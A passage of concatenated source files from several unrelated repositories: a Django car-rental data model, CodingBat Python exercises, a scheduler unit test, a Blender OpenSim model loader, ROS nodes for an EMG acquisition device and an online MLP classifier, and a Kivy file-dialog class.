'TipodeCombustible',
on_delete=models.CASCADE,
)
estado = models.BooleanField(default=True)
def __str__(self):
return self.descripcion
imagen_vehiculo = models.ImageField(null=True, blank=True)
class Meta:
verbose_name = "Vehiculo"
verbose_name_plural = "Vehiculos"
class Cliente(models.Model):
nombre = models.CharField(max_length=40)
cedula = models.CharField(max_length=13, unique=True, validators=[validar_digito_verificador,RegexValidator(regex=r"^\d{3}-\d{7}-\d$",message="Cedula con guiones Ex:(001-0000000-1)")])
numero_tarjeta_de_credito = models.CharField(max_length=13)
limite_de_credito = models.IntegerField(validators=[MinValueValidator(1),])
tipo_de_persona_choices = [
('Jur', 'Juridica'),
('Fis', 'Fisica')
]
tipo_de_persona = models.CharField(max_length=3, choices=tipo_de_persona_choices)
estado = models.BooleanField(default=False)
def __str__(self):
return self.nombre
class Meta:
verbose_name = "Cliente"
verbose_name_plural = "Clientes"
class Empleado(models.Model):
nombre = models.CharField(max_length=40)
cedula = models.CharField(max_length=13, unique=True, validators=[validar_digito_verificador,RegexValidator(regex=r"^\d{3}-\d{7}-\d$",message="Cedula con guiones Ex:(001-0000000-1)")])
tanda_labor_choices = [
('Mat', 'Matutina'),
('Noc', 'Nocturna'),
('Ves', 'Vespertina')
]
tanda_labor = models.CharField(max_length=3, choices=tanda_labor_choices)
porciento_comision = models.IntegerField(validators=[MinValueValidator(1)])
fecha_ingreso = models.DateField(default=timezone.now)
estado = models.BooleanField(default=False)
def __str__(self):
return self.nombre
class Meta:
verbose_name = "Empleado"
verbose_name_plural = "Empleados"
class Inspeccion(models.Model):
vehiculo = models.ForeignKey(
'Vehiculo',
on_delete=models.CASCADE,
)
identificador_cliente = models.ForeignKey(
'Cliente',
on_delete=models.CASCADE,
)
ralladuras = models.BooleanField(default=False)
cantidad_combustible_choices = (
('25%', '1/4'),
('50%', '1/2'),
('75%', '3/4'),
('100%', 'Full')
)
cantidad_combustible = models.CharField(max_length=4, choices=cantidad_combustible_choices)
goma_de_repuesto = models.BooleanField(default=False)
gato = models.BooleanField(default=False)
roturas_cristal = models.BooleanField(default=False)
estado_gomas = models.BooleanField(default=False)
fecha = models.DateField(default=timezone.now)
empleado_inspeccion = models.ForeignKey(
'Empleado',
on_delete=models.CASCADE,
)
estado = models.BooleanField(default=False)
class Meta:
verbose_name = "Inspeccion"
verbose_name_plural = "Inspecciones"
class RentayDevolucion(models.Model):
#Numero_renta = models.IntegerField(unique=True, validators=[MinValueValidator(1)])
numero_renta = models.CharField(max_length=50, default=generar_numero_renta)
def __str__(self):
return (self.numero_renta)
def save(self, force_insert=False, force_update=False, using=None,
update_fields=None):
if self.pk is None:
self.vehiculo_rentayd.estado = False
self.vehiculo_rentayd.save()
super(RentayDevolucion, self).save(force_insert, force_update, using, update_fields)
empleado_rentayd = models.ForeignKey(
'Empleado',
on_delete=models.CASCADE,
)
vehiculo_rentayd = models.ForeignKey(
'Vehiculo',
on_delete=models.CASCADE,
validators=[validar_vehiculo_rentado]
)
cliente_rentayd = models.ForeignKey(
'Cliente',
on_delete=models.CASCADE,
)
fecha_renta = models.DateTimeField(default= timezone.now)
fecha_devolucion = models.DateTimeField(blank=True, null=True)
monto_por_dia = models.FloatField(validators=[MinValueValidator(1),])
cantidad_de_dias = models.IntegerField(validators=[MinValueValidator(1),])
comentario = models.CharField(max_length=100, null=True, blank=True)
estado = models.BooleanField(default=False)
@property
def total (self):
return Decimal(self.monto_por_dia) * Decimal(self.cantidad_de_dias)
class Meta:
verbose_name = "Renta y Devolucion"
verbose_name_plural = "Rentas y Devoluciones"
``` |
{
"source": "JonathanBuchh/CodingBat",
"score": 4
} |
#### File: CodingBat/Python/Warmup-1.py
```python
def sleep_in(weekday, vacation):
if vacation is True:
return True
if weekday is False:
return True
else:
return False
# monkey_trouble
def monkey_trouble(a_smile, b_smile):
if a_smile and b_smile:
return True
if a_smile is False and b_smile is False:
return True
return False
# sum_double
def sum_double(a, b):
    if a == b:
return (a + b)*2
return a + b
# diff21
def diff21(n):
if n > 21:
return abs(21-n)*2
return abs(21-n)
# parrot_trouble
def parrot_trouble(talking, hour):
if talking is True:
if hour < 7 or hour > 20:
return True
return False
# makes10
def makes10(a, b):
    if a == 10 or b == 10:
        return True
    if a + b == 10:
return True
return False
# near_hundred
def near_hundred(n):
if abs(100-n) <= 10 or abs(200-n) <= 10:
return True
return False
# pos_neg
def pos_neg(a, b, negative):
if negative is True:
if a < 0 and b < 0:
return True
return False
if a < 0 and b > 0:
return True
if a > 0 and b < 0:
return True
return False
# not_string
def not_string(str):
if len(str) >= 3 and str[:3] == "not":
return str
return "not " + str
# missing_char
def missing_char(str, n):
return str[:n] + str[n + 1:]
# front_back
def front_back(str):
if len(str) <= 1:
return str
return str[len(str)-1] + str[1:len(str)-1] + str[0]
# front3
def front3(str):
if len(str) < 3:
return str + str + str
triple = str[0:3]
return triple + triple + triple
``` |
{
"source": "JonathanCalderon/ndscheduler",
"score": 3
} |
#### File: corescheduler/core/base_test.py
```python
import unittest
import mock
from ndscheduler.corescheduler.core.base import BaseScheduler
from ndscheduler.corescheduler.datastore.providers.sqlite import DatastoreSqlite
class BaseSchedulerTest(unittest.TestCase):
def test_is_okay_to_run(self):
with mock.patch(('ndscheduler.corescheduler.core.base.'
'BaseScheduler.is_okay_to_run')) as mock_should_run:
mock_should_run.return_value = True
job_stores = {'default': DatastoreSqlite.get_instance()}
dcp = 'ndscheduler.corescheduler.datastore.providers.sqlite.DatastoreSqlite'
sched = BaseScheduler(dcp, jobstores=job_stores)
self.assertNotEqual(sched._process_jobs(), sched.DEFAULT_WAIT_SECONDS)
def test_is_not_okay_to_run(self):
with mock.patch(('ndscheduler.corescheduler.core.base.'
'BaseScheduler.is_okay_to_run')) as mock_should_run:
mock_should_run.return_value = False
job_stores = {'default': DatastoreSqlite.get_instance()}
dcp = 'ndscheduler.corescheduler.datastore.providers.sqlite.DatastoreSqlite'
sched = BaseScheduler(dcp, jobstores=job_stores)
self.assertEqual(sched._process_jobs(), sched.DEFAULT_WAIT_SECONDS)
``` |
{
"source": "JonathanCamargo/BlendOsim",
"score": 2
} |
#### File: BlendOsim/blendosim/model.py
```python
import bpy
from bpy.types import Operator
from bpy.props import FloatVectorProperty
from bpy_extras.object_utils import AddObjectHelper, object_data_add
from mathutils import Vector
import bmesh
import numpy as np
import math
from xml.dom import minidom
import os.path
from blendosim.common import readNames,loadAnimation
defaultOsimPath='C:\\OpenSim 4.0\\Geometry'
def addModel(osimFile,modelRoot='',stlRoot='.',collection=''):
if collection=='':
collection = bpy.data.collections.new('osimModel')
bpy.context.scene.collection.children.link(collection)
if isinstance(collection,str):
collection = bpy.data.collections.new(collection)
bpy.context.scene.collection.children.link(collection)
if modelRoot=='':
modelRoot=os.path.dirname(osimFile)
print('collection:')
print(collection)
xmldoc = minidom.parse(osimFile)
itemlist = xmldoc.getElementsByTagName('BodySet')
bodySet=itemlist[0]
bodies=bodySet.getElementsByTagName('Body')
empties=[0]*len(bodies)
for i,body in enumerate(bodies):
bodyName=body.getAttribute('name')
#create an empty to be the parent of mesh objects
empties[i] = bpy.data.objects.new(bodyName,None)
collection.objects.link(empties[i])
#Read meshes that belong to this body
for i,body in enumerate(bodies):
bodyName=body.getAttribute('name')
meshes=body.getElementsByTagName('Mesh')
for mesh in meshes:
meshName=mesh.getAttribute('name')
files=mesh.getElementsByTagName('mesh_file')
scaleFactorElems=mesh.getElementsByTagName('scale_factors')
scaleFactorStr=scaleFactorElems[0].firstChild.nodeValue
scaleFactor=[float(x) for x in scaleFactorStr.split()]
#print(scaleFactor)
#Create an empty for the mesh to group individual stls into one parent partition
#replace filename to stl to import
file=files[0]
filename=file.firstChild.nodeValue
filename=str.replace(filename,'.vtp','.stl')
#Check if file exists in modelRoot
fullFile=os.path.join(modelRoot,filename)
if not os.path.exists(fullFile):
fullFile=os.path.join(stlRoot,filename)
if not os.path.exists(fullFile):
fullFile=os.path.join(defaultOsimPath,filename)
if not os.path.exists(fullFile):
print(filename+' not found, skipping')
#TODO Here I could check for just vtp and convert to stl.
continue
            # deselect all objects so the imported mesh ends up as the only selected object
for obj in bpy.data.objects:
obj.select_set(False)
bpy.ops.import_mesh.stl(filepath=fullFile)
print(fullFile)
selected_objects = [ o for o in bpy.context.scene.objects if o.select_get() ]
obj=selected_objects[0]
obj.scale=scaleFactor
obj.parent=empties[i]
obj.users_collection[0].objects.unlink(obj)
collection.objects.link(obj)
def loadModel(osimFile,csvFile,modelRoot='',stlRoot='.',collection=''):
if (collection==''):
collection = bpy.data.collections.new('osimModel')
bpy.context.scene.collection.children.link(collection)
addModel(osimFile,modelRoot=modelRoot,stlRoot=stlRoot,collection=collection)
data = np.genfromtxt(csvFile, dtype=float, delimiter=',', names=True,skip_header=0)
objectNames=readNames(data.dtype.names[1:])
loadAnimation(collection,data,objectNames)
#bpy.context.scene.update()
'''
#Example
osimFile='G:\\Dropbox (GaTech)\\PvA\\TestScaling\\OsimXML\\EpicLeg13FullBody_L.osim'
osimPath='G:\Dropbox (GaTech)\cursos\8751\CODE\TerrainPark\CAD\STL\Skeleton'
loadModel(osimFile,stlRoot=osimPath)
'''
``` |
{
"source": "JonathanCamargo/Eris",
"score": 3
} |
#### File: featureextraction/examples/testSubscriber.py
```python
from subscriber import Subscriber #Import the Subscriber class
from time import sleep
import rospy
import signal
import sys
# Remember to do this somewhere in the node where we use anything related to ros
rospy.init_node('somenodename', anonymous=True)
def signal_handler(sig,frame):
''' Terminate the node gracefully'''
print('Ctrl+c')
sys.exit(0)
signal.signal(signal.SIGINT,signal_handler)
#This class can create generic subscribers to our ros topics
somesubscriber=Subscriber('/sometopic','custom_msgs/String')
# The subscriber will be created and we can have acess to information from
# the topic and msg type
print("topic:"+somesubscriber.topic)
print("Channels"+str(somesubscriber.channels))
print("Channel types"+str(somesubscriber.channel_types))
# This info can be just printed using print
print(somesubscriber)
# The subscriber has an internal buffer that can be specified with the argument
# queue_size... Can we just use this instead of the ring buffer? (James)
# To enable the callback just subscribe to the messages and then it will start
# gathering data automatically. e.g.
print("SUBSCRIBING")
somesubscriber.subscribe()
print(somesubscriber)
for i in range(2*60): #Run for 2 minutes to test the callback
q=somesubscriber.getQueue()
print(q)
sleep(1)
```
#### File: python/featureextraction/subscriber.py
```python
import rospy
import threading
import importlib
from collections import deque
from custom_msgs.msg import *
def Subscriber(topic_name, type_str, window=1000):
#creates a subscriber for topic topic_name
#using the class given as a string: type_str
# in the form package_name/message_type
# or in the form package_name.msg.message_type
# alternatively type_str can be passed not as an str, but as the actual msg class
# returns the subscriber instance
try:
if not (type(type_str)==str):
type_str=type_str.__module__
if type(type_str)==str:
if '/' in type_str:
split_type=type_str.split('/')
package_name=split_type[0]
class_name=split_type[1]
if '.' in type_str:
split_type=type_str.split('.')
package_name=split_type[0]
class_name=split_type[2]
class_name=class_name[1:]
module_=importlib.import_module(package_name+'.msg')
data_class=getattr(module_,class_name)
subscriber=GenericSubscriber(topic_name,data_class, window)
except ImportError as e:
print('ERROR in '+package_name+'.msg')
raise ImportError("package %s not found %s"%(package_name,e))
return subscriber
# A generic subscriber class for interfacing any type of message into the GUI
class GenericSubscriber(object):
def __init__(self,topic,data_class,QUEUE_SIZE=1000):
#Properties
self.topic="" # topic name (e.g. /myrobot/someNamespace/somemessage)
self.data_class="" # type of message in the form 'package_name/message_type' e.g. 'custom_msgs/JointState
self.registered = False #indicates if subscriber is registered (i.e. listening to data)
self.paused = False #indicates if subscriber pauses appending data to the queue
self.channels = None
self.queue = deque(maxlen=QUEUE_SIZE) #Queue for saving data
self.subs = None # subscriber object
if topic!="":
self.topic=topic
if data_class!="":
self.topic=topic
self.data_class=data_class
self.channels=self.data_class.__slots__
self.channel_types=self.data_class._slot_types
def callback(self,msg):
if __debug__:
pass
#rospy.loginfo(rospy.get_caller_id()+" %s",msg)
if self.paused==False:
#Get each field in the message
data=[]
for channel in self.channels:
if channel == 'header':
#If header just take the timestamp
time=msg.header.stamp.secs+msg.header.stamp.nsecs/1.0E9
data.append(time)
else:
data.append(getattr(msg,channel))
self.append(data)
def listener(self):
try:
self.subs=rospy.Subscriber(self.topic, self.data_class, self.callback)
except:
print("Could not subscribe")
else:
self.registered=True
def append(self, newElement):
if self.paused == False:
self.queue.append(newElement)
def getQueue(self):
return list(self.queue)
def getChannels(self):
return self.channels
def unsubscribe(self):
if self.subs is not None:
self.subs.unregister()
self.registered=False
def subscribe(self):
if self.registered is False:
self.t=threading.Thread(target=self.listener())
self.t.start()
self.registered=True
def __str__(self):
        ''' Overload str to use print for the subscriber'''
string_1="Topic: {0}\nChannels:{1}\nChannel types:{2}\n".format(self.topic,self.channels,self.channel_types)
if self.registered is True:
string_2="This subscriber is registered"
else:
string_2="This subscriber is NOT registered"
return string_1+string_2
```
#### File: eris_emg/nodes/eris_emg.py
```python
import rospy
from eris.eris import Eris
from eris.customtypes import Signal1CHSample_t,Signal8CHSample_t, floatSample_t, uint8_tSample_t
from custom_msgs.msg import Signal1CH,Signal8CH, String, Float32, Bool, Float32MultiArray
from std_msgs.msg import Header, MultiArrayDimension
from std_msgs.msg import Float32 as stdmsgsFloat32
from construct import Struct,Float32l,Int8ub
import numpy as np
import signal
import sys
import threading
if rospy.has_param('eris/port'):
port=rospy.get_param('eris/port')
else:
port='/dev/ttyACM0'
##################### ROS MESSAGES AND PUBLISHERS ##############################
emgmsg=Signal8CH()
sinemsg=Float32()
fsrmsg=Signal1CH()
textmsg=String()  # message reused by publishText()
textpub = rospy.Publisher('print', String, queue_size=50)
emgpub = rospy.Publisher('emg', Signal8CH, queue_size=100)
sinepub = rospy.Publisher('sine', Float32, queue_size=100)
t0=0 #global variable to store time reference to linux time
def publishEMG(sample):
'''Publish data for EMG'''
timestamp=sample['timestamp']/1000.0
#print(timestamp)
emgmsg.header=Header(stamp=t0+rospy.Duration(timestamp))
emgmsg.ch0=sample['ch'][0]
emgmsg.ch1=sample['ch'][1]
emgmsg.ch2=sample['ch'][2]
emgmsg.ch3=sample['ch'][3]
emgmsg.ch4=sample['ch'][4]
emgmsg.ch5=sample['ch'][5]
emgmsg.ch6=sample['ch'][6]
emgmsg.ch7=sample['ch'][7]
emgpub.publish(emgmsg)
#print(emgmsg)
def publishSine(sample):
'''Publish data for Sine'''
timestamp=sample['timestamp']/1000.0
sinemsg.header=Header(stamp=t0+rospy.Duration(timestamp))
sinemsg.data=sample['value']
sinepub.publish(sinemsg)
def publishText(data):
textmsg.data = data[0];
textmsg.header=Header(stamp=rospy.Time.now())
textpub.publish(textmsg)
def command_callback(msg):
''' A callback to transmit a command to eris'''
e.sendCommand(msg.data)
################################################################################
#Create an eris object
#What to read from Eris?
streams=['SINE','EMG']
streamsformat=[floatSample_t,Signal8CHSample_t]
e=Eris(streams,streamsformat,port)
######################## HELPER FUNCTIONS ######################################
def signal_handler(sig,frame):
''' Terminate the connection to eris and close the node'''
print('Ctrl+c')
e.stop()
sys.exit(0)
signal.signal(signal.SIGINT,signal_handler)
################################################################################
''' Main loop'''
rospy.init_node('eris_emg', anonymous=True)
cmdsub = rospy.Subscriber('eris/command',String,command_callback)
ROSRATE=50 #Hz
rate = rospy.Rate(ROSRATE)
e.sendCommand('TIME0') #Reset time to 0
t0=rospy.Time.now()
rate.sleep()
print('Inicio')
e.start()
while True:
try:
out = e.read()
except Exception as ex:
print('Problem')
print(ex)
e.sendCommand('S_OFF')
rate.sleep()
e.sendCommand('S_ON')
rate.sleep()
continue
for p in out['D']:
for sample in p['SINE']:
publishSine(sample)
for sample in p['EMG']:
publishEMG(sample)
#rospy.loginfo_once("This message will print only once")
rate.sleep()
e.sendCommand('S_OFF')
e.stop()
```
#### File: ml/nodes/classifier.py
```python
import rospy
import numpy as np
import signal
import sys
import threading
import os
from EpicToolbox import FileManager,mkdirfile
from std_msgs.msg import String as StdString
from std_msgs.msg import Header
from custom_msgs.msg import String, Float32MultiArray
from datetime import date
# MODEL DEPENDENT CODE ? WRAP TO CLASS?
from sklearn.neural_network import MLPClassifier
from sklearn.metrics import accuracy_score
from sklearn.model_selection import KFold
from joblib import dump, load
from copy import deepcopy
from scipy import io
##################### ROS MESSAGES AND PUBLISHERS ##############################
stringmsg=String()
std_stringmsg=StdString()
labelpub = rospy.Publisher('prediction',String,queue_size=1)
logpub = rospy.Publisher('log', StdString, queue_size=50)
################################################################################
labels=[]
label=None
active_model=None
lock=threading.Lock()
learning = False
MAX_SAMPLES=100 #Number of samples per class to hold in memory
size=None #Size of the feature vector
memory=dict() #Sample data
numSamples=dict() #Number of samples
VERBOSE=2
# Setup a Rosbag
path=os.path.join(os.environ['HOME'],date.today().strftime('%m_%d_%y'))
mkdirfile(path)
f=FileManager(path,PathStructure=['Type','File'])
#rosparam=Rosparam('/')
############################ ROS CALLBACKS #####################################
def learning_callback(msg):
'''Enable or disable learning'''
global learning
if msg.data=='START':
printAndLog('Learning enabled')
learning=True
elif msg.data=='STOP':
printAndLog('Learning disabled')
learning=False
def label_callback(msg):
global labels,label,size,memory,numSamples,active_model
print('Label:{}'.format(msg.data))
lock.acquire()
label=msg.data
if label in labels:
pass
else:
print('\t New label to the classifier')
if size==None:
lock.release()
return
labels.append(label)
memory[label]=np.zeros((MAX_SAMPLES,size))
numSamples[label]=0
active_model=None #Reset the model since the number of labels changed
lock.release()
def labelstd_callback(msg):
stringmsg.header.stamp=rospy.Time.now()
stringmsg.data=msg.data
label_callback(stringmsg)
def features_callback(msg):
''' Get a new feature sample and incorporate the sample in memory'''
global active_model,labels,label,memory,numSamples,size,learning
if learning == False:
size=msg.layout.dim[0].size
if learning == True:
lock.acquire()
if label==None:
size=msg.layout.dim[0].size
lock.release()
return
# Add the sample to the buffers for the corresponding label
x=memory[label]
idx=numSamples[label]
if idx<MAX_SAMPLES:
x[idx,:]=msg.data
numSamples[label]=numSamples[label]+1
else:
x=np.roll(x,1,axis=0)
x[0,:]=msg.data
memory[label]=x
numSamples[label]=numSamples[label]+1
lock.release()
# Compute the prediction from the active model
if active_model==None:
return
lock.acquire()
out=active_model.predict(np.array([msg.data]))
lock.release()
stringmsg.header.stamp=rospy.Time.now()
stringmsg.data=out[0]
labelpub.publish(stringmsg)
#publish output
######################## HELPER FUNCTIONS ######################################
def signal_handler(sig,frame):
    ''' Close the node gracefully '''
    print('Ctrl+c')
    # no rosbag recorder is created in this node, so there is nothing else to stop
sys.exit(0)
signal.signal(signal.SIGINT,signal_handler)
def printAndLog(strdata):
''' Print and publish string data to the log '''
print(strdata)
std_stringmsg.data=strdata
logpub.publish(std_stringmsg)
def memory2xy(memory):
'''Convert the data from memory to a x,y tables for fitting a model'''
labels=memory.keys()
x=[]
y=[]
for l in labels:
x.append(memory[l])
y.append([l]*memory[l].shape[0])
x=np.concatenate(x)
y=np.concatenate(y)
return x,y
def retrain(memory):
global active_model
mdl = deepcopy(active_model)
x,y=memory2xy(memory)
mdl.partial_fit(x,y)
return mdl
def train(memory):
lr=0.05
tol=0.001
mdl=MLPClassifier(hidden_layer_sizes=(10,10),max_iter=300,learning_rate_init=lr,tol=tol,verbose=VERBOSE)
x,y=memory2xy(memory)
mdl.fit(x,y)
return mdl
def CheckPoint():
global active_model,memory
'''Save a copy of the current model and the data in memory'''
modelfiles=f.fileList({'Type':'model','File':'*.mdl'})
nextmodel=f.genList({'Type':'model','File':'{:01d}.mdl'.format(len(modelfiles)+1)})
nextmemory=f.modFileList(nextmodel,{'Type':'memory','ext':'mat'})
#Save the model
printAndLog('Model checkpoint ({})'.format(nextmodel[0]))
print(nextmemory)
mkdirfile(nextmemory[0])
mkdirfile(nextmodel[0])
dump(active_model,nextmodel[0])
io.savemat(nextmemory[0],{'data':memory})
################################################################################
''' Main loop'''
rospy.init_node('classifier', anonymous=True)
labelsub = rospy.Subscriber('label',String,label_callback)
labelstdsub = rospy.Subscriber('labelstd',StdString,labelstd_callback)
learningsub = rospy.Subscriber('train',String,learning_callback)
learningstdsub = rospy.Subscriber('trainstd',StdString,learning_callback)
featuressub = rospy.Subscriber('features',Float32MultiArray,features_callback)
ROSRATE= 1 #Hz
rate = rospy.Rate(ROSRATE)
rate.sleep()
elapsed=0
lasttime=rospy.Time.now()
# Restore from previous model
models=f.fileList({'Type':'model','File':'*.mdl'})
if len(models)>0:
print('Previous models found:\n\t{}'.format(models))
memoryfiles=f.modFileList(models,{'Type':'memory','ext':'mat'})
active_model=load(models[-1])
memory=io.loadmat(memoryfiles[-1])
print(memory.keys())
count=0
while True:
time=rospy.Time.now()
if ((not label==None) and (label in numSamples.keys())):
printAndLog('label={}({}samples)'.format(label,numSamples[label]))
if labels==[]:
rate.sleep()
continue
n=[numSamples[l] for l in labels]
print(n)
if (learning and (count % 5 == 0)):
if (active_model==None) and (np.all(np.greater(n,MAX_SAMPLES))):
mdl=train(memory)
lock.acquire()
active_model=deepcopy(mdl)
lock.release()
CheckPoint()
elif active_model!=None:
mdl=retrain(memory)
lock.acquire()
active_model=mdl
lock.release()
CheckPoint()
count=count+1
#Wait a second
rate.sleep()
```
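The `train()`/`retrain()` pair above leans on scikit-learn's incremental-learning API: `fit()` builds a fresh network from everything buffered in `memory`, while `retrain()` copies the active model and nudges it with `partial_fit()`. A minimal, self-contained sketch of that pattern (the toy data and label names are made up and independent of the ROS node above):
```python
import numpy as np
from sklearn.neural_network import MLPClassifier

# Toy two-class data standing in for the per-label feature buffers in `memory`.
rng = np.random.default_rng(0)
x = np.vstack([rng.normal(0.0, 1.0, size=(50, 4)),
               rng.normal(3.0, 1.0, size=(50, 4))])
y = np.array(['LW'] * 50 + ['RA'] * 50)  # hypothetical label names

# Initial model, as in train(): a full fit on everything buffered so far.
mdl = MLPClassifier(hidden_layer_sizes=(10, 10), max_iter=300,
                    learning_rate_init=0.05, tol=0.001)
mdl.fit(x, y)

# Later, as in retrain(): update the existing weights with newer samples
# instead of refitting from scratch.
x_new = rng.normal(3.0, 1.0, size=(10, 4))
y_new = np.array(['RA'] * 10)
mdl.partial_fit(x_new, y_new)
print(mdl.predict(x_new[:3]))
```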
#### File: nodes/deletethis/eris_featTest.py
```python
import rospy
import threading
from custom_msgs.msg import Float32, String, featmsg, classmsg, regmsg, maskmsg, Float32MultiArray
from std_msgs.msg import Header, Bool, MultiArrayDimension
from eris.eris import Eris
from threading import Thread,Lock
#from time import sleep
import numpy as np
import struct
from construct import Array,Struct,Float32l,Int8ub,this
import signal
import sys
import copy
#import Exception
dataMutex=Lock()
startFlag = False
runningFlag = False
#What to read from Eris
#Set up Eris driver to retrieve only features
features=['Gait']
featuresformat=Struct(
"timestamp" / Float32l,
"len" / Int8ub,
"features" / Array(this.len,Float32l)
)
gaitFormat = Struct("Gait" / Float32l)
#if rospy.has_param('eris/port'):
# port=rospy.get_param('eris/port')
#else:
#port='/dev/ttyACM0'
port='/dev/ttyACM0'
##################### ROS MESSAGES AND PUBLISHERS ##############################
textmsg = String()
featuresmsg=Float32MultiArray()
regfeatpub = rospy.Publisher('record/RegFeats', Float32MultiArray, queue_size=3)
clasfeatpub = rospy.Publisher('record/ClassFeats', Float32MultiArray, queue_size=3)
classquerypub = rospy.Publisher('eris/ClassQuery', classmsg, queue_size=1)
gaitpub = rospy.Publisher('record/Gait', Float32, queue_size=3)
textpub = rospy.Publisher('eris/text', String, queue_size=1)
#Gait-locations to for classification
gaitLocs = np.array([5, 21.67, 38.33, 55, 71.67, 88.33])
lastGait = 0
################################################################################
#Create an eris object
streams=['Gait']
streamsformat=[gaitFormat]
e=Eris(streams,streamsformat,port)
######################## HELPER FUNCTIONS ######################################
def signal_handler(sig,frame):
print('Ctrl+c')
e.sendCommand('F_OFF')
e.sendCommand('S_OFF')
e.stop()
sys.exit(0)
signal.signal(signal.SIGINT,signal_handler)
def cleanNaN(listcontainer):
''' Remove nans from a listcontainer'''
data = np.array(listcontainer)
n=np.isnan(data)
data=data[~n];
return data
def publishFeaturesHelper(sample, publisher):
'''Publish features data'''
timestamp=sample['timestamp']
featuresmsg.data=sample['features']
featuresmsg.header=Header(stamp=t0+rospy.Duration(timestamp))
featuresmsg.layout.dim=[MultiArrayDimension()]
featuresmsg.layout.dim[0].size=sample['len']
featuresmsg.layout.dim[0].stride=1
featuresmsg.layout.dim[0].label='index'
publisher.publish(featuresmsg)
######################## THREAD FUNCTIONS ######################################
def publishFeatures(data, publisher):
dataMutex.acquire(1)
local=copy.copy(data)
dataMutex.release()
lastpacket=local[-1]
try:
packetdata=featuresformat.parse(lastpacket[0])
except Exception as ex:
print('Packet parse error')
print(ex)
print(lastpacket)
return
#TODO publish a missing data message under eris/errors
publishFeaturesHelper(packetdata, publisher)
def publishGait(data):
global lastGait
dataMutex.acquire(1)
local=copy.copy(data)
dataMutex.release()
currGait = struct.unpack('f', local[0])[0]
gaitmsg = Float32()
gaitmsg.data = currGait
gaitmsg.header = Header(stamp = rospy.Time.now())
#check to see if we need to classify
locInd = np.argmin(abs(gaitLocs - currGait))
loc = gaitLocs[locInd]
if((lastGait < loc) & (currGait > loc) | (lastGait > gaitLocs[-1]) & (currGait > loc) & (locInd == 0)):
#print([lastGait, loc, currGait])
# if going from last to current crosses loc, or if last was near end of gc (larger than
# the latest classif location) and the current gait is greater than the nearest location
querymsg = classmsg()
querymsg.time = rospy.Time.now().to_sec() - t0.to_sec()
querymsg.maskIndex = locInd.item()
classquerypub.publish(querymsg)
gaitpub.publish(gaitmsg)
lastGait = currGait
def publishText(data):
for packet in data:
textmsg.data = packet
textmsg.header=Header(stamp=rospy.Time.now())
textpub.publish(textmsg)
######################## CALLBACK FUNCTIONS ##############################
def command_callback(msg):
e.sendCommand(msg.data)
def reg_callback(msg):
command = "REG " + str(msg.win) + " " + str(msg.inc) + " " + str(msg.maskIndex)
e.sendCommand(command)
def class_callback(msg):
command = "F_CLASS " + str(msg.maskIndex)
print(command)
e.sendCommand(command)
def mask_callback(msg):
command = "F_MASK " + str(msg.isClassifier) + " " + str(msg.chan) + " " + str(msg.index) + " " + msg.mask
e.sendCommand(command)
def start_callback(msg):
global startFlag
startFlag = msg.data
########################### Program Main body ###########################
rospy.init_node('biomnode', anonymous=True)
#Setting up callbacks
cmdsub = rospy.Subscriber('eris/command',String,command_callback)
regsub = rospy.Subscriber('eris/RegParams', regmsg, reg_callback)
classsub = rospy.Subscriber('eris/ClassQuery', classmsg, class_callback)
masksub = rospy.Subscriber('eris/mask', maskmsg, mask_callback)
startsub = rospy.Subscriber('eris/start', Bool, start_callback)
ROSRATE=200 #Hz
rate = rospy.Rate(ROSRATE)
e.sendCommand('TPAC 1')
e.sendCommand('S_OFF')
e.sendCommand('S_TIME')
while True:
if startFlag:
#Runs setup only if start command is issued and we aren't already running
if runningFlag == False:
e.sendCommand('TPAC 1') #Text commands
e.sendCommand('F_ON') #Feature extraction enabled
e.sendCommand('S_ON') #Streaming enabled
print('Start')
t0=rospy.Time.now()
count = 0
runningFlag = True
try:
dataMutex.acquire(1)
d=e.read()
dataMutex.release()
except Exception as ex:
dataMutex.release()
print('Problem')
print(ex)
e.sendCommand('S_OFF')
rate.sleep()
e.sendCommand('S_ON')
rate.sleep()
continue
#Get data from teensy
if type(d) is dict:
if len(d['R'])>0:
tr = Thread(target = publishFeatures, args = ((d['R'],), regfeatpub))
tr.start()
if len(d['C'])>0:
tc = Thread(target = publishFeatures, args = ((d['C'],),clasfeatpub))
tc.start()
if len(d['D'])>0:
td = Thread(target = publishGait, args = (d['D'],))
td.start()
if len(d['T'])>0:
tt = Thread(target = publishText, args = (d['T'],))
tt.start()
#If we are running but we're not supposed to be, stop
elif runningFlag == True:
e.sendCommand('F_OFF')
e.sendCommand('S_OFF')
runningFlag = False
rate.sleep()
``` |
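The crossing test inside `publishGait()` above is the subtle part: it fires a classification query when the gait percentage passes one of the `gaitLocs` checkpoints, and it also handles the wrap-around from the end of one gait cycle into the next. A small standalone sketch of the same predicate with made-up gait values (not tied to the Eris hardware):
```python
import numpy as np

gait_locs = np.array([5, 21.67, 38.33, 55, 71.67, 88.33])

def crossed_checkpoint(last_gait, curr_gait, locs=gait_locs):
    """Return (crossed, index) for the checkpoint nearest to curr_gait."""
    loc_ind = int(np.argmin(abs(locs - curr_gait)))
    loc = locs[loc_ind]
    crossed = ((last_gait < loc) and (curr_gait > loc)) or \
              ((last_gait > locs[-1]) and (curr_gait > loc) and (loc_ind == 0))
    return crossed, loc_ind

print(crossed_checkpoint(20.0, 23.0))  # crosses 21.67 -> (True, 1)
print(crossed_checkpoint(23.0, 24.0))  # nothing crossed -> (False, 1)
print(crossed_checkpoint(95.0, 6.0))   # wrap-around past 5 -> (True, 0)
```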
{
"source": "JonathanCamargo/SignalViewer",
"score": 2
} |
#### File: EpicLeg/statslayout/statslayout.py
```python
from kivy.uix.gridlayout import GridLayout
from viewer import SignalViewer
class StatsLayout(GridLayout):
def __init__(self,**kwargs):
super(StatsLayout,self).__init__(**kwargs)
```
#### File: SignalViewer/layout/filechoosing.py
```python
from kivy.uix.floatlayout import FloatLayout
from kivy.properties import ObjectProperty
from kivy.clock import Clock
class LoadDialog(FloatLayout):
#Class for generating a generic load dialog
#to use it, create an instance of LoadDialog and override the cancel_callback and open_callback methods
filechooser=ObjectProperty(None)
load = ObjectProperty(None)
cancel = ObjectProperty(None)
path = '.'
def __init__(self,path='.',**kwargs):
super(LoadDialog,self).__init__(**kwargs)
self.path=path
Clock.schedule_once(lambda dt: self.build(),0)
def build(self):
self.filechooser.path=self.path
self.filechooser.on_submit=self.on_submit_callback
def cancel_callback(self):
print("cancel")
def on_submit_callback(self,selection,touch):
self.path=selection[0]
self.open_callback(self.path)
def _open_callback(self):
if len(self.filechooser.selection) > 0:
self.path=self.filechooser.selection[0]
self.open_callback(self.path)
def open_callback(self,path):
print(path)
class SaveDialog(FloatLayout):
